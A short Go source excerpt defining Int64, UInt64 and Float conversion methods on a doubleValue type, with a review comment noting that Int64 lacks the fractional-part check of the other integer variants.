// NOTE(review): unlike Int8/Int16/Int32, this variant performs no
// fractional-part check — confirm whether that asymmetry is intended.
func (value *doubleValue) Int64() (int64, error) {
	return int64(byteToFLoat64(value.value)), nil
}
// UInt64 converts the stored float64 into a uint64 by truncation.
func (value *doubleValue) UInt64() (uint64, error) {
	return uint64(byteToFLoat64(value.value)), nil
}
// Float returns the stored bytes decoded as a float64; it never fails.
func (value *doubleValue) Float() (float64, error) {
	return byteToFLoat64(value.value), nil
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.